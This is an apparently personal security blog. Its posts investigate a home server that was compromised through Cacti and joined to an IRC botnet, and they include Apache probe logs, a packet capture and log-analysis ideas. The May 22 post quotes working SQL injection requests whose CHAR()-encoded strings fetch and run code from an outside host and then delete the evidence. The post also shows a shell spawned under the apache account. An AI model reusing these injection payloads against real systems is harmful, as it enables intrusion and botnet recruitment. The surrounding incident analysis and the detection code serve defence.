May 22, 2007

With some help, I find the vulnerability

Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results with those from my HP printer. The requests came from the same IP my computer was IRCing to. I should start tracking changes so I have a record of what was changed, when it was changed, and whether I granted myself access.

Here are the log lines from Apache:

213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"

Apparently, that was all it took for my server to be compromised.
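The CHAR() arguments in those requests are plain ASCII code points, so the strings the attacker injected can be read straight out of the access log. As an added example (not the post's own code), this Python decoder parses the Apache lines, flags the /**/-obfuscated UNION SELECT, decodes every CHAR() call, and notes whether the server answered 200 to the injected request; its input is the first and last log lines quoted above.

```python
import re
from typing import Dict, List, Optional

# Apache common/combined log prefix: client IP, identd, user, [timestamp], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# MySQL CHAR(n,n,...) builds a string from code points; it keeps quote characters out of the URL.
CHAR_RE = re.compile(r'CHAR\(([\d,]+)\)', re.IGNORECASE)
# /**/ stands in for whitespace between SQL keywords, the obfuscation used in the cmd.php requests above.
SQLI_RE = re.compile(r'/\*\*/(?:UNION|SELECT|FROM)/\*\*/', re.IGNORECASE)

# Two lines quoted from the Apache log above: a plain page fetch and the attacker's clean-up request.
SAMPLE_LINES = [
    '213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"',
    '213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/'
    '2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,'
    'CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111'
    ' HTTP/1.0" 200 18 "-" "-"',
]


def decode_char_calls(query: str) -> List[str]:
    """Return the text built by every CHAR(...) call in a query string, in order of appearance."""
    return [''.join(chr(int(n)) for n in m.group(1).split(',') if n)
            for m in CHAR_RE.finditer(query)]


def analyse(line: str) -> Optional[Dict]:
    """Parse one access-log line; flag comment-obfuscated UNION SELECT injection and decode its strings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    script, _, query = m.group('path').partition('?')
    injected = SQLI_RE.search(query) is not None
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'script': script,
        'status': int(m.group('status')),
        'sqli': injected,
        # Decoded CHAR() payloads: the address the bogus host row points at and the command it carries.
        'strings': decode_char_calls(query) if injected else [],
    }


def scan(lines: List[str]) -> List[Dict]:
    """Keep only the injected requests; a 200 on such a request means the server accepted the query."""
    findings = []
    for line in lines:
        rec = analyse(line)
        if rec and rec['sqli']:
            rec['accepted'] = rec['status'] == 200
            findings.append(rec)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LINES):
        print(f"{f['time']} {f['ip']} {f['script']} status={f['status']} accepted={f['accepted']}")
        for s in f['strings']:
            print('   decoded:', s)
```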

Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.

May 21, 2007

I Catch the Hackers in the Act

If you've ever wondered exactly how a vulnerability is exploited, or how botnets happen, check out the capture below. Keep in mind that my system is up-to-date on just about everything I can find to update on it. I also informed the abuse address for the IP in question about what was going on over a month ago, and the rogue server is still out there, relaying information from compromised Linux servers.

I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it, because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server; at least, that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:

The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.

Download the uncensored TCPDump file and see for yourself.

my server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
: NOTICE AUTH :*** Looking up your hostname..NOTICE AUTH :*** Checking Ident..
my server: ....
: NOTICE AUTH :*** No ident response..
my server: FF 86 C5 CD
: NOTICE AUTH :*** Found your hostname.
my server: ....
:.y.I
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
: PING :1041065789..
my server: ....
: .y..
my server: PONG :1041065789.
: (ACK)
: www.nasa.gov 433 * a3sh- :Nickname is already in use..
my server: (ACK)
my server: NICK a3sh-685.
: :www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network : a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..
my server: JOIN #mihai.

:a3sh-685!~nh2ies@c-68-34-65-58.hsd1.md.comcast.net JOIN :#mihai..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-685 a3sh-9337 a3sh-4554 a3sh-8354 a3sh-2934 a3sh-3103 a3sh-8151 a3sh-4633 a3sh-3872 a3sh-2552 a3sh-1595 a3sh-9230 a3sh-5907 a3sh-2313 a3sh-6041 a3sh-2448 a3sh-5134 a3sh-3633 a3sh-5025 a3sh-1979 a3sh-9893 a3sh-8688 a3sh-7544 a3sh-4987 a3sh-975 a3sh-8640 a3sh-7756 a3sh-6376 a3sh-9321 a3sh-5422 a3sh-5761 a3sh-9259 a3sh-5956 a3sh-7978 a3sh-9088 a3sh-701 a3sh-4473 a3sh-7260 a3sh-2013 a3sh-9890 a3sh-933 a3sh-8007 a3sh-6486 a3sh-7318 a3sh-5495 a3sh-6205 a3sh-6078..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-7555 a3sh-791 a3sh-1336 a3sh-5923 a3sh-4822 a3sh-8527 a3sh-4988 a3sh-90 a3sh-4895 a3sh-7019 a3sh-6666 a3sh-4330 a3sh-8521 a3sh-215 a3sh-5509 a3sh-6106 a3sh-4579 a3sh-8655 a3sh-1998 a3sh-9573 a3sh-5017 a3sh-6554 a3sh-8403 a3sh-288 a3sh-3328 a3sh-4059 a3sh-6246 a3sh-697 a3sh-7085 a3sh-9646 a3sh-8876 a3sh-6779 a3sh-3730 a3sh-8248 a3sh-4757 a3sh-7497 a3sh-4715 a3sh-4357 a3sh-229 a3sh-4681 a3sh-8629 a3sh-2734 a3sh-6290 a3sh-930 a3sh-1515 a3sh-1103 a3sh-3405 a3sh-9597..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-914 a3sh-2419 a3sh-1961 a3sh-624 a3sh-9217 a3sh-8124 a3sh-9198 a3sh-1667 a3sh-7710 a3sh-3272 a3sh-2880 a3sh-5360 a3sh-9749 a3sh-60 a3sh-6378 a3sh-2191 a3sh-8644 a3sh-1313 a3sh-2447 a3sh-3410 a3sh-4480 a3sh-8506 a3sh-1625 a3sh-5664 a3sh-5614 a3sh-9804 a3sh-1344 a3sh-4523 a3sh-7203 a3sh-3438 a3sh-3646 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...

April 18, 2007

They tried to get my server to join a BotNet

I first noticed a mysterious connection on a netstat:

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 1 mrtg.sampas.net:42321 223-118-92-213.server:49153 SYN_SENT

I also noticed Apache had opened a shell:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
1 S apache 18005 1 0 76 0 - 1282 - Apr10 ? 00:00:00 sh -i
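Both of those artifacts can be checked for automatically. This is an added example, not the post's own tooling: it parses ps -elf and netstat lines and flags a web-server account running a shell, a web-server process whose parent is init rather than httpd, and an outbound connection to a port the host has no reason to reach. The web-server account names, the single served port (80) and the allowed outbound ports are assumptions for this host; the sample lines are quoted from the output above.

```python
from typing import List

# Assumptions for this host: the account httpd runs as, the only port it serves, and the
# outbound ports it may legitimately use (the post keeps most outbound ports closed).
WEB_ACCOUNTS = {'apache', 'www-data', 'nobody'}
SERVED_PORTS = {80}
EXPECTED_OUTBOUND_PORTS = {25, 53, 80, 443}
SHELLS = {'sh', 'bash', 'dash', 'ksh', 'zsh'}

PS_FIELDS = 'F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD'.split()

# Quoted from the netstat and ps -elf output above.
NETSTAT_SAMPLE = [
    'Active Internet connections (servers and established)',
    'Proto Recv-Q Send-Q Local Address Foreign Address State',
    'tcp 0 1 mrtg.sampas.net:42321 223-118-92-213.server:49153 SYN_SENT',
]
PS_SAMPLE = [
    'F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD',
    '1 S apache 18005 1 0 76 0 - 1282 - Apr10 ? 00:00:00 sh -i',
]


def check_process(line: str) -> List[str]:
    """Flag a web-server account running a shell, or a web-server process parented by init."""
    parts = line.split(None, len(PS_FIELDS) - 1)   # CMD keeps its arguments
    if len(parts) < len(PS_FIELDS):
        return []
    rec = dict(zip(PS_FIELDS, parts))
    if rec['UID'] not in WEB_ACCOUNTS:
        return []
    findings = []
    argv = rec['CMD'].split()
    if argv and argv[0].rsplit('/', 1)[-1] in SHELLS:
        findings.append(f"{rec['UID']} pid {rec['PID']} is a shell: {rec['CMD']}")
    if rec['PPID'] == '1':
        # httpd workers are children of the httpd parent; PPID 1 means this one was orphaned.
        findings.append(f"{rec['UID']} pid {rec['PID']} is parented by init, not httpd")
    return findings


def check_socket(line: str) -> List[str]:
    """Flag outbound TCP connections from this host to ports it has no business reaching."""
    parts = line.split()
    if len(parts) != 6 or not parts[0].startswith('tcp'):
        return []
    _, _, _, local, foreign, state = parts
    lport, fport = local.rpartition(':')[2], foreign.rpartition(':')[2]
    if not (lport.isdigit() and fport.isdigit()):
        return []            # listening sockets show '*' on the foreign side
    if int(lport) in SERVED_PORTS:
        return []            # a client talking to our web server, not us calling out
    if state in {'SYN_SENT', 'ESTABLISHED'} and int(fport) not in EXPECTED_OUTBOUND_PORTS:
        return [f"outbound {state} to {foreign} from local port {lport}"]
    return []


def triage(ps_lines: List[str], netstat_lines: List[str]) -> List[str]:
    findings: List[str] = []
    for line in ps_lines:
        findings += check_process(line)
    for line in netstat_lines:
        findings += check_socket(line)
    return findings


if __name__ == '__main__':
    for f in triage(PS_SAMPLE, NETSTAT_SAMPLE):
        print('!!', f)
```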

Soon after, perl became a runaway process, consuming 100% of my CPU time. And I thought /sbin/nologin meant user Apache couldn't just get a shell. I updated zlib from 1.2.2 to 1.2.3 to fix a security hole. up2date -u reports everything is up-to-date. (It did that for my old zlib, too.) I don't see any new holes in my applications, MT and Gallery. I did a Nessus scan with recent updates, and it showed no holes and one warning. I ran clamscan and it didn't find anything, either. Rkhunter found nothing, and nikto gave me the following output:

+ Server: Apache/2.0.52 (Red Hat)
+ Allowed HTTP Methods: GET,HEAD,POST,OPTIONS,TRACE
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.2.3). Apache 1.3.33 is still maintained and considered secure.
+ / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)
+ /usage/ - Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

So now I'm stuck looking through my apache access logs, because that's the only thing exposed to the outside world.

I did a capture while opening my firewall for a couple of minutes, and I saw it try to log in to an IRC channel. Ouch. I've been pwned. Fortunately, my firewall stops my server from being used for attacks, and I was able to block the port range used by the IRC bot.

Finally, Red Hat released a lot of new patches for PHP, and I set PerlTaintCheck On in /etc/httpd/conf.d/perl.conf, which was the real problem: user Apache had started listening on port 80 using Perl, so I couldn't even restart httpd.

Next time, I need to check the logs closer and post a network capture of the login process.

June 29, 2006

Network Analysis With Free EtherPeek: Ethereal Gets Some Competition

Way back in 1999, I was looking for a packet analyzer. I was familiar with EtherPeek for the Macintosh from a few years before, and I found that the AG Group was producing EtherPeek for Windows, too. The AG Group is now WildPackets, and they are exceedingly helpful to anyone that has to troubleshoot data networks. AG Group always offered some cool network freebies: IP Subnet Calculator, netTools and a great protocol reference chart.

One of their people, J. Scott Haugdahl, has an excellent book, Network Analysis and Troubleshooting, which offers a bottom-up review of the OSI 7-layer model. (Which one are you: All People Say They Need Data Processing or Please Do Not Throw Sausage Pizza Away?)

I liked EtherPeek and the book so much that I bought both and paid out of my own pocket even though my job was managing the network. Of course, this was back in the day when running tcpdump required you to know your IRQ, DMA and chip set (i.e. DEC Tulip). My job at the time was helping change a campus network from Netware to TCP/IP when Windows and Macintosh didn't even install a TCP/IP stack by default. We went from three-and-a-half network protocols (two different Netware frame types) to one and a half (we still had a couple of AppleTalk issues.) Each computer was on the Internet with a public IP address and no firewall. The ping of death still worked against most machines, and we also got hit with Smurf and Trinoo attacks that would disrupt all online activity.

WildPackets makes some excellent packet analyzers for wired and wireless networks. Now their base-level product is free: OmniPeek Personal. While I have been using Ethereal since my old version of EtherPeek became obsolete because it was on my ancient Dell laptop, I missed EtherPeek because it was the first packet analyzer I really got to know well. I could create filters and find exactly what I needed to find. EtherPeek also had good summary statistical functions, which could tell me who was producing the most traffic on my networks. Omnipeek Personal is better than my copy of EtherPeek was because it includes some expert analysis about bad packets and delayed response times. It also produces HTML statistics just like the original, and it has a better interface than Ethereal, using color to show differences between packets.

For those of you that underestimate the power of color, try printing a Google or Mapquest map in black and white and one in color and see which one is easier to read while you're driving. OmniPeek makes it easier to read your packet stats and is easier on your eyes than Ethereal. It's also supposed to do wireless captures -- I'll update when I get a compatible chipset wireless card.

June 24, 2006

Data Mining and Data Warehousing Might Just Protect Your Identity, Someday

In dealing with financial activities, our law enforcement/intelligence community is someplace between Get Smart and Mission:Impossible, depending on which story you read in the newspaper.

Eighty-one people in 17 states used a California woman's Social Security number, according to the AP on June 18, 2006. You'd think the IRS or Social Security Administration would notice that 81 jobs falls outside the normal range of jobs. Maybe even past 3 standard deviations above the mean number of jobs that people hold in a given time period.

"They knew what was happening but wouldn't do anything," said Schmierer, 33, a housewife in this San Francisco suburb. "One name, one number; why can't they just match it up?"

Then on June 23, the New York Times breaks a story about how the Treasury is overseeing a CIA program that monitors data going through the Society for Worldwide Interbank Financial Telecommunications. What do these reporters think FinCen does? They look for the same kind of activity that the NY Times-revealed program does, except they've been doing it a lot longer than the CIA.

A former compliance officer for a major brokerage once told me that you might get away with insider trading once. After that the investigators would know the people with whom you attended kindergarten and might be in a position to give you insider information. That's link analysis.

The last time I bought AMEX traveler's cheques it took half an hour because of the paperwork required by the bank to satisfy post-9/11 financial tracking regulations, so it doesn't surprise me that the intelligence community is monitoring international transactions. (The paperwork is so tedious that I'm going to carry cash more often than not.)

Our government can access tons and tons of data about every transaction that travels across our borders, but without efficient algorithms for flagging suspicious activity, it will all be useless. Placing every tax return and W-2 statement into a single data warehouse would be academic. Yahoo and Google probably generate more data in a week than all our tax returns and W-2s annually. You would think the Social Security Administration would be able to see the fraud in their systems. The ACLU wouldn't even be able to argue that our government isn't allowed to look at its own data.

Once you loaded the data, a few queries could spit out suspicious Social Security Number users in a day or two. Again, the budget for this would be under a million or two.

June 20, 2006

Counting Web Attacks

I see a lot of 404 errors in my Apache logs. A 404 error is a file not found, i.e. someone has requested a file that's not there. Often it means I made a typo in a configuration or HTML someplace. More often, it means someone someplace is probing my server for weak web applications.

Linux and open source software have made it easy to add web applications running under Apache and MySQL. The problem is as more and more sites start using these cool web applications, hackers are able to find holes in them. The developers fix the holes and release patches, but many webmasters don't apply the patches. Thus I see probes like the one below in my Apache logs:

212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 320 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 294 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 303 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 301 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /ads/adxmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /xmlrpc.php HTTP/1.0" 404 292 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /blog/xmlrpc.php HTTP/1.0" 404 297 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /drupal/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /community/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogs/xmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 305 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 308 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 305 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 305 "-" "-"

This is a probe, not an attack. There's nothing illegal about requesting files that aren't on my server, is there? But if I touch /var/www/html/adxmlrpc.php, we may find out what happens next. Note that most of these requests, while probing for different applications, share one thing in common: RPC on PHP.

Below is a chart of probes by date and request on this web server. There's not enough space to list each one as it corresponds to the color. (MS Excel shows me the details of each data point on mouseover in my pivot table.)

Attacks by Application

June 9, 2006

Your (Firewall) Data are Ugly. Please Fix It.

Data warehousing and data marts would be simple to construct if only the data were in a standard format. Five years from now, businesses will take OLAP for granted. (OLAP is a fancy way of saying we're going to automate the sums and averages of your sales data over time so you don't have to do all that stuff in Excel any more.) Five to ten years from now, businesses will live or die by their data mining algorithms. (I classify DM as a step above standard OLAP.) Before this can happen, the data have to be available in a usable form.

I come from an information security background, thus I spend far too much time poring over computer logs: web server access logs, firewall logs, Windows event logs, not to mention /var/log/*. I have learned lots of stupid log tricks, like using logwatch, grep (my favorite), Snare to send Windows logs to syslog, and now, Microsoft's free Logparser tool. Logparser has poor documentation but will certainly pay you back for time taken to learn to use it. There's even a non-Microsoft site dedicated to logparser.

Note: Syslog does not store data in 3NF rows. If you want to be able to sort by fields with destPort, sourcePort, sourceIP, destIP, without doing text search, you'll be doing a LOT of ETL work.

This week I was thinking about replacing my firewall/router (a Netopia R9100 with the hardware VPN upgrade that I trade off with a Linksys WRT-54GS (v3) when I'm not paranoid about using wireless.) And yes, I'm not supposed to tell you that, but it doesn't really make a difference if we're both using nmap. So I looked at firewall vendors' websites to learn what I could about logging capabilities. I'm slightly less concerned about security in my home lab than I am about collecting data on attacks. Firewalls have been around for over ten years now, so you'd think they would have logging down.

Watchguard: several logging options, including syslog and XML, SNMP costs extra.

Juniper/NetScreen: syslog, SNMP, NetIQ (If I feel like paying for that, too.)

Checkpoint: "Eventia Reporter™ is a complete reporting system that delivers in-depth network security activity and event information from Check Point log data." This means I can look at CheckPoint logs, but I can't correlate them to anything else. This Checkpoint vs. Cisco page is also interesting.

SonicWall: "ViewPoint®, Local Log, Syslog, WebTrends" I can pay extra for SonicWall's "Viewpoint" product, but I still can't correlate SonicWall logs to any other logs. One SonicWall includes a "secure" switch in their firewall: I would love to see what happens when I try an arp spoof. (If I wanted a switch, I would buy one.)

Cisco PIX: SNMP, Syslog, and AAA ("Authentication, Authorization, and Accounting Support") It does Cisco logging. It also has a CLI. (Command-Line Interface.) Unless Cisco starts giving me free hardware, I'm not sure why I'd use a PIX. If I blow a command, my network is not secure. A CLI is fine when it's obvious if a command is working or not, as with routing, but with firewalls, it makes me nervous. Then again, you should test every port after entering a rule change on your firewall.

Microsoft ISA Server: "ISA Server 2004 provides detailed security and access logs in standard data formats, such as delimited text files, Microsoft SQL Server databases, or SQL Server 2000 Desktop Engine (MSDE) databases."

I don't even like software firewalls, but Microsoft makes it easy for me. At $1,500 plus $250 for decent software, Watchguard is more expensive than ISA server. Checkpoint and Juniper won't even tell me how much their products cost. Sonicwall, Watchguard, and ISA Server are all priced on CDW.

If firewall data are this disparate, I can't imagine what a pain it must be to build data warehouses with data from other sources. Current firewall products seem to create their own silos and make it difficult to track intruders across a network rather than just at the perimeter.

June 6, 2006

The Sum of All Ports, coming to a SQL server near you.

Using syslog, MS SQL 2005, SQL Server Analysis Services, and MS Excel, I can build a cube with my firewall log violations and then import the cube into Excel and produce pivot tables. While this might seem more complicated than it needs to be, I could produce a daily scorecard of attacks. The only catch is that I need a firewall that logs to SQL server or a syslog to SQL server connector. The syslog => SQL connection would be tough because my router/firewall doesn't do uniform syslog notifications. I know enterprise-level firewalls do much better logging, like the Watchguard X-series which I was fond of just because I could make them do almost anything. The last time I checked, though, they still cost $1,500 for the base model plus $500 for the appropriate software.

With the Watchguard's new XML logging, I could create a SQL Server Integration Services package to import the data regularly. From there, I could get SQL Server Analysis services to process my cube each night. Then I use Microsoft Sharepoint's Scorecard or OLAP web part to display statistics. Best of all, I wouldn't have to mess with doing my own manual extract-transform-load (ETL) of my router log data.

The graph below represents a simple count of attacks by port on my router. Port 0 corresponds to ICMP. (I don't respond to ping requests.) The rest of the ports are closed, except for port 80, which you're using now. I ban a few IPs on port 80 because they won't stop posting junk trackbacks onto my blog. The ports are in alphabetical order rather than numerical order because I must store them in text fields rather than numerical fields in the database. If the port numbers aren't text then SSAS will OLAP them and I'll end up with the sum of all ports, which is nonsense but nevertheless might make a good statistic for MBA-types. While the graphic may not be all that impressive, the scalability is. Using SQL and SSAS, I could track probes and attacks on hundreds of firewalls at a time, track trends over time, and even predict the level of future probes.

Probes by Port

June 5, 2006

Assessing Attacks; or 18th Century Epistolary Novels vs. Data Structures

Being assigned a data warehousing/data mining project for class sounds like fun, but where am I supposed to get a data set? I can buy a database of all area codes and exchanges with latitude and longitude, but I would still have to simulate a hundred million records to address scalability and query optimization issues. Then I could find out if my estimates of the size of records are within a factor of ten, but the networks I see still wouldn't be "real" and I would have no idea if that's what real social networks looked like. (As an undergrad English Lit major, I was reading 18th Century epistolary novels instead of taking Data Structures like my Computer Science major classmates. The sad part is that Data Structures would have been more interesting.)

Fortunately, data magically appear on my Linux box every day.

Each morning at four am, logwatch runs on my Fedora Core 4 (Red Hat Linux) box. It tells me how many times nonexistent files on my webserver have been requested, and how many router firewall violation attempts have been logged. It also tells me how many times Apache logged a "method not allowed" 405 code. I have several daily log files that give me useful information on attacks. The problem is that there are so many attacks that if I banned every IP that looked for a web application hole or probed a port I wouldn't have time for anything else.

So it makes sense to look for attack source IP (Internet Protocol) addresses that probe my router AND request holes in web apps. To do this I need three files: my router log from syslog, and two greps of all my Apache logs (grep -h suppresses file names at the beginning of each line), one looking for 404 errors and one for 405 errors. This gives me three tables, from which I can do inner joins on source IP. Of course, I have to do some tedious data cleanup to get the text log files into Excel and from there into Access. (I always underestimate the time it takes to clean up data.) From Access, I'm going to go to SQL 2005 and Analysis Services, and build a cube. From there I should be able to "see" the attacks using Pivot Tables in Microsoft Excel.

If I see a source IP in my router log and Apache error logs, then it's probably worth banning. Correlating IP addresses to identify those involved in multiple methods of attack takes me from hundreds of IP addresses down to six.
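The inner join described here, done in Python rather than Access and Excel, as an added example that is not the post's own code; it also counts which script each 404 probe from the June 20 post was looking for. The Apache lines are quoted from the logs above; the router syslog lines and their "DENY ... from" format are constructed, since the post does not show the Netopia's own format.

```python
import re
from collections import Counter
from typing import Dict, List

# Apache access-log prefix, the same format as the 404 lines in the June 20 post.
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)
# Constructed router syslog format (assumption: the real Netopia lines differ); only the source IP matters.
ROUTER_RE = re.compile(r'\bDENY\b.*?\bfrom (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+')

# Three lines quoted from the 404 probe above, plus constructed ones: 198.51.100.7 probes, 203.0.113.5 is a visitor.
APACHE_SAMPLE = [
    '212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 294 "-" "-"',
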